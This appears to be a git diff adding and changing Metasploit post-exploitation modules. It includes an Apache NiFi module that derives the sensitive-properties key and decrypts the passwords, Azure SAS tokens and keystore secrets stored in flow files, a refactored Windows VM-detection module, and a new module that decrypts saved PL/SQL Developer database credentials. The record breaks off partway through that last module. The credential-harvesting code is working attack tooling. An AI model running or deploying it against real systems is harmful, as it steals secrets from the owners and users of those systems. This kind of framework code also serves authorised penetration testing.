+ OptString.new('NIFI_FLOW_JSON', [false, 'NiFi flow.json.gz file', '/opt/nifi/conf/flow.json.gz']),
+ OptString.new('NIFI_IDENTITY', [false, 'NiFi login-identity-providers.xml file', '/opt/nifi/conf/login-identity-providers.xml']),
+ OptString.new('NIFI_AUTHORIZERS', [false, 'NiFi authorizers file', '/opt/nifi/conf/authorizers.xml']),
+ OptInt.new('ITERATIONS', [true, 'Encryption iterations', 160_000])
+ ], self.class
+ )
+ end
+
+ def authorizers_file
+ return @authorizers_file if @authorizers_file
+
+ [datastore['NIFI_authorizers'], "#{datastore['NIFI_PATH']}/conf/authorizers.xml"].each do |f|
+ unless file_exist? f
+ vprint_bad("#{f} not found")
+ next
+ end
+ vprint_status("Found authorizers.xml file #{f}")
+ unless readable? f
+ vprint_bad("#{f} not readable")
+ next
+ end
+ print_good("#{f} is readable!")
+ @authorizers_file = f
+ break
+ end
+ @authorizers_file
+ end
+
+ def identity_file
+ return @identity_file if @identity_file
+
+ [datastore['NIFI_IDENTITY'], "#{datastore['NIFI_PATH']}/conf/login-identity-providers.xml"].each do |f|
+ unless file_exist? f
+ vprint_bad("#{f} not found")
+ next
+ end
+ vprint_status("Found login-identity-providers.xml file #{f}")
+ unless readable? f
+ vprint_bad("#{f} not readable")
+ next
+ end
+ print_good("#{f} is readable!")
+ @identity_file = f
+ break
+ end
+ @identity_file
+ end
+
+ def properties_file
+ return @properties_file if @properties_file
+
+ [datastore['NIFI_PROPERTIES'], "#{datastore['NIFI_PATH']}/conf/nifi.properties"].each do |f|
+ unless file_exist? f
+ vprint_bad("#{f} not found")
+ next
+ end
+ vprint_status("Found nifi.properties file #{f}")
+ unless readable? f
+ vprint_bad("#{f} not readable")
+ next
+ end
+ print_good("#{f} is readable!")
+ @properties_file = f
+ break
+ end
+ @properties_file
+ end
+
+ def flow_file
+ return @flow_file if @flow_file
+
+ [datastore['NIFI_FLOW_JSON'], "#{datastore['NIFI_PATH']}/conf/flow.json.gz"].each do |f|
+ unless file_exist? f
+ vprint_bad("#{f} not found")
+ next
+ end
+ vprint_status("Found flow.json.gz file #{f}")
+ unless readable? f
+ vprint_bad("#{f} not readable")
+ next
+ end
+ print_good("#{f} is readable!")
+ @flow_file = f
+ break
+ end
+ @flow_file
+ end
+
+ def salt
+ 'NiFi Static Salt'
+ end
+
+ def process_type_azure_storage_credentials_controller_service(name, service)
+ table_entries = []
+ storage_account_name = parse_aes_256_gcm_enc_string(service['storage-account-name'])
+ return table_entries if storage_account_name.nil?
+
+ storage_account_name_decrypt = decrypt_aes_256_gcm(storage_account_name, @decrypted_key)
+
+ # this is optional
+ if service['managed-identity-client-id']
+ client_id = parse_aes_256_gcm_enc_string(service['managed-identity-client-id'])
+ return table_entries if client_id.nil?
+
+ client_id_decrypt = decrypt_aes_256_gcm(client_id, @decrypted_key)
+ else
+ client_id_decrypt = ''
+ end
+
+ sas_token = parse_aes_256_gcm_enc_string(service['storage-sas-token'])
+ return table_entries if sas_token.nil?
+
+ sas_token_decrypt = decrypt_aes_256_gcm(sas_token, @decrypted_key)
+
+ information = "storage-account-name: #{storage_account_name_decrypt}"
+ information << ", storage-endpoint-suffix: #{service['storage-endpoint-suffix']}" if service['storage-endpoint-suffix']
+ table_username = client_id_decrypt.empty? ? '' : "managed-identity-client-id: #{client_id_decrypt}"
+
+ @flow_json_string = @flow_json_string.gsub(service['storage-sas-token'], sas_token_decrypt)
+ @flow_json_string = @flow_json_string.gsub(service['storage-account-name'], storage_account_name_decrypt)
+ @flow_json_string = @flow_json_string.gsub(service['managed-identity-client-id'], client_id_decrypt) unless client_id_decrypt.empty?
+ table_entries << [name, table_username, sas_token_decrypt, information]
+ table_entries
+ end
+
+ # This function is built to attempt to decrypt a processor/service that we dont have a specific decryptor for.
+ # we may miss grouping some fields together, but its better to print them out than do nothing with them.
+ def process_type_generic(name, processor)
+ table_entries = []
+ processor.each do |property|
+ property_name = property[0]
+ property_value = property[1]
+ next unless property_value.is_a? String
+ next unless property_value.starts_with? 'enc{'
+
+ password = parse_aes_256_gcm_enc_string(property_value)
+ next if password.nil?
+
+ password_decrypt = decrypt_aes_256_gcm(password, @decrypted_key)
+ table_entries << [name, '', password_decrypt, "Property name: #{property_name}"]
+ @flow_json_string = @flow_json_string.gsub(property_value, password_decrypt)
+ end
+ table_entries
+ end
+
+ def process_type_org_apache_nifi_processors_standard_gethttp(name, processor)
+ table_entries = []
+ return table_entries unless processor['Password']
+
+ username = processor['Username']
+ url = processor['URL']
+ password = parse_aes_256_gcm_enc_string(processor['Password'])
+ return table_entries if password.nil?
+
+ password_decrypt = decrypt_aes_256_gcm(password, @decrypted_key)
+ table_entries << [name, username, password_decrypt, "URL: #{url}"]
+ @flow_json_string = @flow_json_string.gsub(processor['Password'], password_decrypt)
+ table_entries
+ end
+
+ def process_type_standard_restricted_ssl_context_service(controller_properties)
+ table_entries = []
+ if controller_properties['Keystore Filename'] && controller_properties['Keystore Password']
+ name = 'Keystore'
+ username = controller_properties['Keystore Filename']
+ password = parse_aes_256_gcm_enc_string(controller_properties['Keystore Password'])
+ unless password.nil?
+ password_decrypt = decrypt_aes_256_gcm(password, @decrypted_key)
+ table_entries << [name, username, password_decrypt, '']
+ @flow_json_string = @flow_json_string.gsub(controller_properties['Keystore Password'], password_decrypt)
+ end
+ end
+
+ if controller_properties['Truststore Filename'] && controller_properties['Truststore Password']
+ name = 'Truststore'
+ username = controller_properties['Truststore Filename']
+ password = parse_aes_256_gcm_enc_string(controller_properties['Truststore Password'])
+ unless password.nil?
+ password_decrypt = decrypt_aes_256_gcm(password, @decrypted_key)
+ table_entries << [name, username, password_decrypt, "Truststore Type #{controller_properties['Truststore Type']}"]
+ @flow_json_string = @flow_json_string.gsub(controller_properties['Truststore Password'], password_decrypt)
+ end
+ end
+
+ return table_entries unless controller_properties['Truststore Filename'] && controller_properties['key-password']
+
+ name = 'Key Password'
+ username = controller_properties['Truststore Filename']
+ password = parse_aes_256_gcm_enc_string(controller_properties['key-password'])
+ return table_entries if password.nil?
+
+ password_decrypt = decrypt_aes_256_gcm(password, @decrypted_key)
+ table_entries << [name, username, password_decrypt, "Truststore Type #{controller_properties['Truststore Type']}"]
+ @flow_json_string = @flow_json_string.gsub(controller_properties['key-password'], password_decrypt)
+
+ table_entries
+ end
+
+ def decrypt_aes_256_gcm(enc_fields, key)
+ vprint_status(' Decryption initiated for AES-256-GCM')
+ vprint_status(" Nonce: #{enc_fields[:nonce]}, Auth Tag: #{enc_fields[:auth_tag]}, Ciphertext: #{enc_fields[:ciphertext]}")
+ cipher = OpenSSL::Cipher.new('AES-256-GCM')
+ cipher.decrypt
+ cipher.key = key
+ cipher.iv_len = 16
+ cipher.iv = [enc_fields[:nonce]].pack('H*')
+ cipher.auth_tag = [enc_fields[:auth_tag]].pack('H*')
+
+ decrypted_text = cipher.update([enc_fields[:ciphertext]].pack('H*'))
+ decrypted_text << cipher.final
+ decrypted_text
+ end
+
+ def parse_aes_256_gcm_enc_string(password)
+ password = password[4, password.length - 5] # remove enc{ at the beginning and } at the end
+ password.match(/(? \w{32})(?\w+)(?\w{32})/) # parse out the fields
+ end
+
+ def run
+ unless ((flow_file && properties_file) || identity_file)
+ fail_with(Failure::NotFound, 'Unable to find login-identity-providers.xml, nifi.properties and/or flow.json.gz files')
+ end
+
+ properties = read_file(properties_file)
+ path = store_loot('nifi.properties', 'text/plain', session, properties, 'nifi.properties', 'nifi properties file')
+ print_good("properties data saved in: #{path}")
+ key = properties.scan(/^nifi.sensitive.props.key=(.+)$/).flatten.first.strip
+ fail_with(Failure::NotFound, 'Unable to find nifi.properties and/or flow.json.gz files') if key.nil?
+ print_good("Key: #{key}")
+ algorithm = properties.scan(/^nifi.sensitive.props.algorithm=(\w+)$/).flatten.first.strip
+ fail_with(Failure::NotFound, 'Unable to find nifi.properties and/or flow.json.gz files') if algorithm.nil?
+
+ columns = ['Name', 'Username', 'Password', 'Other Information']
+ table = Rex::Text::Table.new('Header' => 'NiFi Flow Data', 'Indent' => 1, 'Columns' => columns)
+
+ if flow_file
+ flow_json = Zlib.gunzip(read_file(flow_file))
+
+ path = store_loot('nifi.flow.json', 'application/json', session, flow_json, 'flow.json', 'nifi flow data')
+ print_good("Original data containing encrypted fields saved in: #{path}")
+
+ flow_json = JSON.parse(flow_json)
+ @flow_json_string = JSON.pretty_generate(flow_json) # so we can save an unencrypted version as well
+
+ # NIFI_PBKDF2_AES_GCM_256 is the default as of 1.14.0
+ # leave this as an if statement so it can be expanded to include more algorithms in the future
+ if algorithm == 'NIFI_PBKDF2_AES_GCM_256'
+ # https://gist.github.com/tylerpace/8f64b7e00ffd9fb1ef5ea70df0f9442f
+ @decrypted_key = OpenSSL::PKCS5.pbkdf2_hmac(key, salt, datastore['ITERATIONS'], 32, OpenSSL::Digest.new('SHA512'))
+
+ vprint_status('Checking root group processors')
+ flow_json.dig('rootGroup', 'processors').each do |processor|
+ vprint_status(" Analyzing #{processor['processor']} of type #{processor['type']}")
+ case processor['type']
+ when 'org.apache.nifi.processors.standard.GetHTTP'
+ table_entries = process_type_org_apache_nifi_processors_standard_gethttp(processor['name'], processor['properties'])
+ else
+ table_entries = process_type_generic(processor['name'], processor['properties'])
+ end
+ table.rows.concat table_entries
+ end
+
+ vprint_status('Checking root group controller services')
+ flow_json.dig('rootGroup', 'controllerServices').each do |service|
+ vprint_status(" Analyzing #{service['name']} of type #{service['type']}")
+ case service['type']
+ when 'org.apache.nifi.services.azure.storage.AzureStorageCredentialsControllerService_v12',
+ 'org.apache.nifi.services.azure.storage.AzureStorageCredentialsControllerService'
+ table_entries = process_type_azure_storage_credentials_controller_service(service['name'], service['properties'])
+ when 'org.apache.nifi.ssl.StandardRestrictedSSLContextService'
+ table_entries = process_type_standard_restricted_ssl_context_service(service['properties'])
+ else
+ table_entries = process_type_generic(service['name'], service['properties'])
+ end
+ table.rows.concat table_entries
+ end
+
+ else
+ print_bad("Processor for #{algorithm} not implemented in module. Use nifi-toolkit to potentially change algorithm.")
+ end
+
+ unless @flow_json_string == JSON.pretty_generate(flow_json) # dont write if we didn't change anything
+ path = store_loot('nifi.flow.decrypted.json', 'application/json', session, @flow_json_string, 'flow.decrypted.json', 'nifi flow data decrypted')
+ print_good("Decrypted data saved in: #{path}")
+ end
+ end
+
+ vprint_status('Checking identity file')
+ if identity_file
+ identity_content = read_file(identity_file)
+ xml = Nokogiri::XML.parse(identity_content)
+
+ xml.xpath('//loginIdentityProviders//provider').each do |c|
+ name = c.xpath('identifier').text
+ username = c.xpath('property[@name="Username"]').text
+ hash = c.xpath('property[@name="Password"]').text
+ next if (username.blank? || hash.blank?)
+
+ table << [name, username, hash, 'From login-identity-providers.xml']
+
+ credential_data = {
+ jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),
+ origin_type: :session,
+ post_reference_name: refname,
+ private_type: :nonreplayable_hash,
+ private_data: hash,
+ session_id: session_db_id,
+ username: username,
+ workspace_id: myworkspace_id
+ }
+ create_credential(credential_data)
+ end
+ end
+
+ vprint_status('Checking authorizers file')
+ if authorizers_file
+ authorizers_content = read_file(authorizers_file)
+ xml = Nokogiri::XML.parse(authorizers_content)
+
+ xml.xpath('//authorizers//userGroupProvider').each do |c|
+ next if c.xpath('property[@name="Client Secret"]').text.blank?
+
+ name = c.xpath('identifier').text
+ username = "Directory/Tenant ID: #{c.xpath('property[@name="Directory ID"]').text}" \
+ ", Application ID: #{c.xpath('property[@name="Application ID"]').text}"
+ password = c.xpath('property[@name="Client Secret"]').text
+ next if (username.blank? || hash.blank?)
+
+ table << [name, username, password, 'From authorizers.xml']
+ end
+ end
+
+ if !table.rows.empty?
+ print_good('NiFi Flow Values')
+ print_line(table.to_s)
+ end
+ end
+end
diff --git a/modules/post/windows/gather/checkvm.rb b/modules/post/windows/gather/checkvm.rb
index 457acbfef0..5367307901 100644
--- a/modules/post/windows/gather/checkvm.rb
+++ b/modules/post/windows/gather/checkvm.rb
@@ -40,26 +40,90 @@ class MetasploitModule < Msf::Post
)
end
- def get_services
- @services ||= registry_enumkeys('HKLM\\SYSTEM\\ControlSet001\\Services')
- @services
+ # enumerates through a list of VM signature processes and compares them to
+ # the processes running, returns true upon a match.
+ def processes_exist?(vm_processes)
+ vm_processes.each do |x|
+ @processes.each do |p|
+ return true if p['name'].casecmp?(x)
+ end
+ end
+ false
+ end
+
+ # loops over a list of services that are known to be signatures of vm's and
+ # compares them to the list of running services.
+ def services_exist?(vm_services)
+ vm_services.each do |srvc|
+ return true if service_exists?(srvc)
+ end
+ false
end
def service_exists?(service)
- get_services && get_services.include?(service)
+ @services.include?(service)
+ end
+
+ # registers relevant keys and stores them in a hash
+ def register_keys(key_list)
+ @keys = {}
+ key_list.each do |k|
+ srvals = get_srval(k)
+ srvals = [] if srvals.nil?
+ @keys.store(k, srvals)
+ end
+ @keys
+ end
+
+ # checks the values of the keys and compares them to vm_k
+ def key_present?(vm_k)
+ @keys.each_value do |v|
+ return true if v.include?(vm_k)
+ end
+ false
+ end
+
+ def get_srval(key)
+ srvals = registry_enumkeys(key)
+ srvals = [] if srvals.nil?
+ srvals
+ end
+
+ # returns true if regval matches a regex
+ def regval_match?(key, val, rgx)
+ return true if get_regval_str(key, val) =~ rgx
+
+ false
+ end
+
+ # returns true if regval is eql to a string
+ def regval_eql?(key, val, str)
+ get_regval_str(key, val) == str
end
def get_regval_str(key, valname)
ret = registry_getvaldata(key, valname)
- if ret.kind_of(Array)
+ if ret.is_a?(Array)
ret = ret.join
end
ret
end
+ def parallels?
+ @system_bios_version = get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'SystemBiosVersion')
+
+ @video_bios_version = get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'VideoBiosVersion')
+
+ if @system_bios_version =~ /parallels/i || @video_bios_version =~ /parallels/i
+ return true
+ end
+
+ false
+ end
def hyperv?
physical_host = get_regval_str('HKLM\\SOFTWARE\\Microsoft\\Virtual Machine\\Guest\\Parameters', 'PhysicalHostNameFullyQualified')
+
if physical_host
report_note(
host: session,
@@ -67,46 +131,59 @@ class MetasploitModule < Msf::Post
data: { physicalHost: physical_host },
update: :unique_data
)
+
print_good("This is a Hyper-V Virtual Machine running on physical host #{physical_host}")
return true
end
sfmsvals = registry_enumkeys('HKLM\\SOFTWARE\\Microsoft')
if sfmsvals
- return true if sfmsvals.include?('Hyper-V')
- return true if sfmsvals.include?('VirtualMachine')
+ %w[Hyper-V VirtualMachine].each do |vm|
+ return true if sfmsvals.include?(vm)
+ end
end
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'SystemBiosVersion') =~ /vrtual/i
-
- %w[HKLM\\HARDWARE\\ACPI\\FADT HKLM\\HARDWARE\\ACPI\\RSDT].each do |key|
- srvvals = registry_enumkeys(key)
- return true if srvvals && srvvals.include?('VRTUAL')
+ if @system_bios_version =~ /vrtual/i || @system_bios_version == 'Hyper-V'
+ return true
end
- %w[vmicexchange vmicheartbeat vmicshutdown vmicvss].each do |service|
- return true if service_exists?(service)
- end
+ keys = %w[HKLM\\HARDWARE\\ACPI\\FADT HKLM\\HARDWARE\\ACPI\\RSDT HKLM\\HARDWARE\\ACPI\\DSDT]
- key_path = 'HKLM\\HARDWARE\\DESCRIPTION\\System'
- system_bios_version = get_regval_str(key_path, 'SystemBiosVersion')
- return true if system_bios_version && system_bios_version.include?('Hyper-V')
+ register_keys(keys)
- key_path = 'HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0'
- return true if get_regval_str(key_path, 'Identifier') =~ /Msft Virtual Disk 1.0/i
+ return true if key_present?('VRTUAL')
+
+ hyperv_services = %w[vmicexchange]
+
+ return true if services_exist?(hyperv_services)
false
end
def vmware?
- %w[vmdebug vmmouse VMTools VMMEMCTL tpautoconnsvc tpvcgateway vmware wmci vmx86].each do |service|
- return true if service_exists?(service)
- end
+ vmware_services = %w[
+ vmdebug vmmouse VMTools VMMEMCTL tpautoconnsvc
+ tpvcgateway vmware wmci vmx86
+ ]
+
+ return true if services_exist?(vmware_services)
+
+ @system_manufacturer = get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS',
+ 'SystemManufacturer')
+
+ return true if @system_manufacturer =~ /vmware/i
+
+ @scsi_port_1 = get_regval_str('HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0',
+ 'Identifier')
+
+ return true if @scsi_port_1 =~ /vmware/i
+
+ return true if regval_match?(
+ 'HKLM\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000',
+ 'DriverDesc',
+ /cl_vmx_svga|VMWare/i
+ )
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS', 'SystemManufacturer') =~ /vmware/i
- return true if get_regval_str('HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0', 'Identifier') =~ /vmware/i
- return true if get_regval_str('HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0', 'Identifier') =~ /vmware/i
- return true if get_regval_str('HKLM\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000', 'DriverDesc') =~ /cl_vmx_svga|VMWare/i
vmwareprocs = [
'vmtoolsd.exe',
@@ -114,11 +191,8 @@ class MetasploitModule < Msf::Post
'vmwaretray.exe',
'vmwareuser.exe'
]
- get_processes.each do |x|
- vmwareprocs.each do |p|
- return true if p == x['name'].downcase
- end
- end
+
+ return true if processes_exist?(vmwareprocs)
false
end
@@ -128,28 +202,29 @@ class MetasploitModule < Msf::Post
'vboxservice.exe',
'vboxtray.exe'
]
- get_processes.each do |x|
- vboxprocs.each do |p|
- return true if p == x['name'].downcase
- end
+
+ vbox_srvcs = %w[VBoxMouse VBoxGuest VBoxService VBoxSF VBoxVideo]
+
+ if services_exist?(vbox_srvcs) || processes_exist?(vboxprocs)
+ return true
end
- %w[HKLM\\HARDWARE\\ACPI\\DSDT HKLM\\HARDWARE\\ACPI\\FADT HKLM\\HARDWARE\\ACPI\\RSDT].each do |key|
- srvvals = registry_enumkeys(key)
- return true if srvvals && srvvals.include?('VBOX__')
- end
+ return true if key_present?('VBOX__')
for i in 0..2 do
- return true if get_regval_str("HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port #{i}0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", 'Identifier') =~ /vbox/i
+ return true if regval_match?(
+ "HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port #{i}0\\Scsi Bus 0\\Target
+ Id 0\\Logical Unit Id 0",
+ 'Identifier',
+ /vbox/i
+ )
end
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'SystemBiosVersion') =~ /vbox/i
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'VideoBiosVersion') =~ /virtualbox/i
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS', 'SystemProductName') =~ /virtualbox/i
+ return true if @system_bios_version =~ /vbox/i || @video_bios_version =~ /virtualbox/i
- %w[VBoxMouse VBoxGuest VBoxService VBoxSF VBoxVideo].each do |service|
- return true if service_exists?(service)
- end
+ @system_product_name = get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS', 'SystemProductName')
+
+ return true if @system_product_name =~ /virtualbox/i
false
end
@@ -158,52 +233,36 @@ class MetasploitModule < Msf::Post
xenprocs = [
'xenservice.exe'
]
- get_processes.each do |x|
- xenprocs.each do |p|
- return true if p == x['name'].downcase
- end
+
+ xen_srvcs = %w[xenevtchn xennet xennet6 xensvc xenvdb]
+
+ if processes_exist?(xenprocs) || services_exist?(xen_srvcs)
+ return true
end
- %w[HKLM\\HARDWARE\\ACPI\\DSDT HKLM\\HARDWARE\\ACPI\\FADT HKLM\\HARDWARE\\ACPI\\RSDT].each do |key|
- srvvals = registry_enumkeys(key)
- return true if srvvals && srvvals.include?('Xen')
- end
+ return true if key_present?('Xen')
- %w[xenevtchn xennet xennet6 xensvc xenvdb].each do |service|
- return true if service_exists?(service)
- end
-
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS', 'SystemProductName') =~ /xen/i
+ return true if @system_product_name =~ /xen/i
false
end
def qemu?
- key_path = 'HKLM\\HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0'
- return true if get_regval_str(key_path, 'Identifier') =~ /qemu|virtio/i
-
- key_path = 'HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0'
- return true if get_regval_str(key_path, 'ProcessorNameString') =~ /qemu/i
-
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'SystemBiosVersion') =~ /qemu/i
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'VideoBiosVersion') =~ /qemu/i
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS', 'SystemManufacturer') =~ /qemu/i
-
- %w[HKLM\\HARDWARE\\ACPI\\DSDT HKLM\\HARDWARE\\ACPI\\FADT HKLM\\HARDWARE\\ACPI\\RSDT].each do |key|
- srvvals = registry_enumkeys(key)
- return true if srvvals && srvvals.include?('BOCHS_')
+ if @system_bios_version =~ /qemu/i || @video_bios_version =~ /qemu/i
+ return true
end
- false
- end
-
- def parallels?
- bios_version = get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'SystemBiosVersion')
- if bios_version.kind_of?(Array)
- bios_version = bios_version.join
+ if @scsi_port_0 =~ /qemu|virtio/i || @system_manufacturer =~ /qemu/i
+ return true
end
- return true if bios_version =~ /parallels/i
- return true if get_regval_str('HKLM\\HARDWARE\\DESCRIPTION\\System', 'VideoBiosVersion') =~ /parallels/i
+
+ return true if regval_match?(
+ 'HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0',
+ 'ProcessorNameString',
+ /qemu/i
+ )
+
+ return true if key_present?('BOCHS_')
false
end
@@ -221,6 +280,11 @@ class MetasploitModule < Msf::Post
def run
print_status('Checking if the target is a Virtual Machine ...')
+ @processes = get_processes
+ @processes = [] if @processes.nil?
+
+ @services = registry_enumkeys('HKLM\\SYSTEM\\ControlSet001\\Services')
+ @services = [] if @services.nil?
if parallels?
report_vm('Parallels')
diff --git a/modules/post/windows/gather/credentials/plsql_developer.rb b/modules/post/windows/gather/credentials/plsql_developer.rb
new file mode 100644
index 0000000000..40871ba29a
--- /dev/null
+++ b/modules/post/windows/gather/credentials/plsql_developer.rb
@@ -0,0 +1,279 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::Windows::UserProfiles
+ include Msf::Post::File
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Windows Gather PL/SQL Developer Connection Credentials',
+ 'Description' => %q{
+ This module can decrypt the histories and connection credentials of PL/SQL Developer,
+ and passwords are available if the user chooses to remember.
+ },
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ [ 'URL', 'https://adamcaudill.com/2016/02/02/plsql-developer-nonexistent-encryption/']
+ ],
+ 'Author' => [
+ 'Adam Caudill', # Discovery of legacy decryption algorithm
+ 'Jemmy Wang' # Msf module & Discovery of AES decryption algorithm
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ],
+ 'Compat' => {
+ 'Meterpreter' => {
+ 'Commands' => %w[
+ stdapi_fs_ls
+ stdapi_fs_separator
+ stdapi_fs_stat
+ ]
+ }
+ },
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [IOC_IN_LOGS],
+ 'Reliability' => []
+ }
+ )
+ )
+ register_options(
+ [
+ OptString.new('PLSQL_PATH', [ false, 'Specify the path of PL/SQL Developer']),
+ ]
+ )
+ end
+
+ def decrypt_str_legacy(str)
+ result = ''
+ key = str[0..3].to_i
+ for i in 1..(str.length / 4 - 1) do
+ n = str[(i * 4)..(i * 4 + 3)].to_i
+ result << (((n - 1000) ^ (key + i * 10)) >> 4).chr
+ end
+ return result
+ end
+
+ # New AES encryption algorithm introduced since PL/SQL Developer 15.0
+ def decrypt_str_aes(str)
+ bytes = Rex::Text.decode_base64(str)
+
+ cipher = OpenSSL::Cipher.new('aes-256-cfb8')
+ cipher.decrypt
+ hash = Digest::SHA1.digest('PL/SQL developer + Oracle 11.0.x')
+ cipher.key = hash + hash[0..11]
+ cipher.iv = bytes[0..7] + "\x00" * 8
+
+ return cipher.update(bytes[8..]) + cipher.final
+ end
+
+ def decrypt_str(str)
+ # Empty string
+ if str == ''
+ return ''
+ end
+
+ if str.match(/^(\d{4})+$/)
+ return decrypt_str_legacy(str) # Legacy encryption
+ elsif str.match(%r{^X\.([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)$})
+ return decrypt_str_aes(str[2..]) # New AES encryption
+ end
+
+ # Shouldn't reach here
+ print_error("Unknown encryption format: #{str}")
+ return '[Unknown]'
+ end
+
+ # Parse and separate the history string
+ def parse_history(str)
+ # @keys is defined in decrypt_pref, and this function is called by decrypt_pref after @keys is defined
+ result = Hash[@keys.map { |k| [k.to_sym, ''] }]
+ result[:Parent] = '-2'
+
+ if str.end_with?(' AS SYSDBA')
+ result[:ConnectAs] = 'SYSDBA'
+ str = str[0..-11]
+ elsif str.end_with?(' AS SYSOPER')
+ result[:ConnectAs] = 'SYSOPER'
+ str = str[0..-12]
+ else
+ result[:ConnectAs] = 'Normal'
+ end
+
+ # Database should be the last part after '@' sign
+ ind = str.rindex('@')
+ if ind.nil?
+ # Unexpected format, just use the whole string as DisplayName
+ result[:DisplayName] = str
+ return result
+ end
+
+ result[:Database] = str[(ind + 1)..]
+ str = str[0..(ind - 1)]
+
+ unless str.count('/') == 1
+ # Unexpected format, just use the whole string as DisplayName
+ result[:DisplayName] = str
+ return result
+ end
+
+ result[:Username] = str[0..(str.index('/') - 1)]
+ result[:Password] = str[(str.index('/') + 1)..]
+
+ return result
+ end
+
+ def decrypt_pref(file_name)
+ file_contents = read_file(file_name)
+ if file_contents.nil? || file_contents.empty?
+ print_status "Skipping empty file: #{file_name}"
+ return []
+ end
+
+ print_status("Decrypting #{file_name}")
+ result = []
+
+ logon_history_section = false
+ connections_section = false
+
+ # Keys that we care about
+ @keys = %w[DisplayName Number Parent IsFolder Username Database ConnectAs Password]
+ # Initialize obj with empty values
+ obj = Hash[@keys.map { |k| [k.to_sym, ''] }]
+ # Folder parent objects
+ folders = {}
+
+ file_contents.split("\n").each do |line|
+ line.gsub!(/(\n|\r)/, '')
+
+ if line == '[LogonHistory]' && !(logon_history_section || connections_section)
+ logon_history_section = true
+ next
+ elsif line == '[Connections]' && !(logon_history_section || connections_section)
+ connections_section = true
+ next
+ elsif line == ''
+ logon_history_section = false
+ connections_section = false
+ next
+ end
+
+ if logon_history_section
+ # Contents in [LogonHistory] section are plain encrypted strings
+ # Calling the legacy decrypt function is intentional here
+ result << parse_history(decrypt_str_legacy(line))
+ elsif connections_section
+ # Contents in [Connections] section are key-value pairs
+ ind = line.index('=')
+ if ind.nil?
+ print_error("Invalid line: #{line}")
+ next
+ end
+
+ key = line[0..(ind - 1)]
+ value = line[(ind + 1)..]
+
+ if key == 'Password'
+ obj[:Password] = decrypt_str(value)
+ elsif obj.key?(key.to_sym)
+ obj[key.to_sym] = value
+ end
+
+ # Color is the last field of a connection
+ if key == 'Color'
+ if obj[:IsFolder] != '1'
+ result << obj
+ else
+ folders[obj[:Number]] = obj
+ end
+
+ # Reset obj
+ obj = Hash[@keys.map { |k| [k.to_sym, ''] }]
+ end
+
+ end
+ end
+
+ # Build display name (Add parent folder name to the beginning of the display name)
+ result.each do |item|
+ pitem = item
+ while pitem[:Parent] != '-1' && pitem[:Parent] != '-2'
+ pitem = folders[pitem[:Parent]]
+ if pitem.nil?
+ print_error("Invalid parent: #{item[:Parent]}")
+ break
+ end
+ item[:DisplayName] = pitem[:DisplayName] + '/' + item[:DisplayName]
+ end
+
+ if item[:Parent] == '-2'
+ item[:DisplayName] = '[LogonHistory]' + item[:DisplayName]
+ else
+ item[:DisplayName] = '[Connections]/' + item[:DisplayName]
+ end
+
+ # Remove fields used to build the display name
+ item.delete(:Parent)
+ item.delete(:Number)
+ item.delete(:IsFolder)
+
+ # Add file path to the final result
+ item[:FilePath] = file_name
+ end
+
+ return result
+ end
+
+ def enumerate_pref(plsql_path)
+ result = []
+ pref_dir = plsql_path + session.fs.file.separator + 'Preferences'
+ session.fs.dir.entries(pref_dir).each do |username|
+ udir = pref_dir + session.fs.file.separator + username
+ file_name = udir + session.fs.file.separator + 'user.prefs'
+
+ result << file_name if directory?(udir) && file?(file_name)
+ end
+
+ return result
+ end
+
+ def run
+ print_status("Gather PL/SQL Developer Histories and Credentials on #{sysinfo['Computer']}")
+ profiles = grab_user_profiles
+ pref_paths = []
+
+ profiles.each do |user_profiles|
+ session.fs.dir.entries(user_profiles['AppData']).each do |dirname|
+ if dirname.start_with?('PLSQL Developer')
+ search_dir = user_profiles['AppData'] + session.fs.file.separator + dirname
+ pref_paths += enumerate_pref(search_dir)
+ end
+ end
+ end
